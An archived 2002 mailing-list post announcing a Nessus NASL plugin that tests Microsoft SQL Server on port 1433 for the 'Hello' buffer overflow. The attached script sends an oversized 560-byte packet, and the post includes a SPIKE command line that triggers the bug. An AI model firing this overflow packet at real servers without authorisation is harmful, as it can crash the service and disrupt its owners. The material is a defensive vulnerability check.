MS SQL Server Hello Overflow NASL script


Date: 07 Aug 2002 11:10:19 -0400
From: Dave Aitel <[email protected]>
To: [email protected]
Subject: MS SQL Server Hello Overflow NASL script

--=-MxOQRrO17dfkkETKWeQw
Content-Type: multipart/mixed; boundary="=-cIWr8WljaMzjhDWtDbAD"


--=-cIWr8WljaMzjhDWtDbAD
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Since people seem unable to type: export LD_LIBRARY_PATH=. ;
./generic_send_tcp target 1433 audits/MSSQL/mssql.spk; I've attached a
NASL script that will also demonstrate the vulnerability. It even has
the correct ID number and will soon be available from the Nessus
homepage as well, for those of you who do a daily auto-update.

I'm not, however, planning to release NASL scripts for the Exchange 2000
vulnerabilities, nor do I plan to release a working exploit for the SQL
Server vulnerability (except to Immunity, Inc. larger customers, who
have access to all of Immunity's ongoing research.)

Dave Aitel
Immunity, Inc.
http://www.immunitysec.com/

=20



--=-cIWr8WljaMzjhDWtDbAD
Content-Disposition: attachment; filename=mssql_hello_overflow.nasl
Content-Type: text/plain; name=mssql_hello_overflow.nasl; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

##
#
# this script tests for the "You had me at hello" overflow
# in MSSQL (tcp/1433)
# Copyright Dave Aitel (2002)
# Bug found by: Dave Aitel (2002)
#
##
#TODO:
#technically we should also go to the UDP 1434 resolver service
#and get any additional ports!!!


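if(description)
{
 # Plugin registration branch.  Nessus runs the script with `description`
 # set to collect this metadata; the exit(0) at the end keeps the network
 # code further down from running in that mode.
 script_id(11067);
 # NOTE(review): the commented-out identifier below is a 2000-series CVE
 # while this bug was found in 2002; it does not obviously describe the
 # Hello overflow.  Confirm the correct id before enabling script_cve_id().
 # script_cve_id("CVE-2000-0402");
 script_version ("$Revision: 0.1 $");
 name["english"] = "Microsoft SQL Server Hello Overflow";
 script_name(english:name["english"]);

 desc["english"] = "
The remote MS SQL server is vulnerable to the Hello overflow.

An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM, 
as well as read your database content. 

Solution : disable this service (Microsoft SQL Server).

Risk factor : High";

 script_description(english:desc["english"]);

 summary["english"] = "Microsoft SQL Server Hello Overflow";
 script_summary(english:summary["english"]);

 # ACT_ATTACK: this plugin sends the oversized packet itself (crap(560)
 # below) rather than inferring the flaw from a version banner, so it is
 # potentially disruptive to the target service.
 script_category(ACT_ATTACK);

 script_copyright(english:"This script is Copyright (C) 2002 Dave Aitel");
 family["english"] = "Windows";
 script_family(english:family["english"]);
 # Only the default listener port is covered; see the TODO at the top of
 # the file about ports advertised by the UDP 1434 resolver service.
 script_require_ports(1433);
 exit(0);
}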

#
# The script code starts here
#
#taken from mssql.spk
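# Fixed bytes sent before the attack string.  Copied verbatim from
# mssql.spk (the original author's comment); the meaning of the individual
# fields is not documented here -- presumably a TDS-style packet header,
# but confirm against the SPIKE audit before changing any byte.  The
# quoted-printable soft line breaks in the archived copy (`0x=` / `06`,
# `0=` / `xff`) have been re-joined into 0x06 and 0xff.
pkt_hdr = raw_string(
 0x12, 0x01, 0x00, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x15, 0x00, 0x06, 0x01, 0x00, 0x1b,
 0x00, 0x01, 0x02, 0x00, 0x1c, 0x00, 0x0c, 0x03, 0x00, 0x28, 0x00, 0x04, 0xff, 0x08, 0x00, 0x02,
 0x10, 0x00, 0x00, 0x00
);

# Fixed bytes appended after the attack string, also taken from mssql.spk.
pkt_tail = raw_string(
 0x00, 0x24, 0x01, 0x00, 0x00
);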

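# TODO (from the original author): the UDP 1434 resolver service can
# advertise additional listener ports; only the default port is checked.
port = 1433;

# Text attached to the finding when the check fires.  It mirrors the
# plugin description above; the two are kept as separate literals because
# the description branch exits before this code runs.
report = "The SQL Server is vulnerable to the Hello overflow.

An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM,
as well as read your database content.

Solution : disable this service (Microsoft SQL Server).

Risk factor : High";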


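if(get_port_state(port))
{
    soc = open_sock_tcp(port);

    if(soc)
    {
        # To observe the server's normal reply instead of testing the
        # overflow, substitute the benign string the original author left
        # commented out: attack_string = "MSSQLServer";
        attack_string = crap(560);
        sql_packet = pkt_hdr + attack_string + pkt_tail;
        send(socket:soc, data:sql_packet);

        r = recv(socket:soc, length:4096);
        close(soc);

        # Detection heuristic: a server that survives the packet is
        # expected to answer; a vulnerable one is assumed to drop the
        # connection without replying.  An empty r can equally come from a
        # recv() timeout or from a non-SQL service on 1433, so treat the
        # finding as probable rather than confirmed.  The debug display()
        # calls that printed r and a "Security Hole" line to stdout have
        # been removed; security_hole() is the plugin's only output.
        if(!r)
        {
            security_hole(port:port, data:report);
        }
    }
}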

--=-cIWr8WljaMzjhDWtDbAD--

--=-MxOQRrO17dfkkETKWeQw
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQA9UThbB8JNm+PA+iURAkqDAKDVbL0jMZs+7YmslqtcifxRl8pPeACbBMUc
djUabrwFmT5XZ5rE/T7yuGs=
=Xsdg
-----END PGP SIGNATURE-----

--=-MxOQRrO17dfkkETKWeQw--
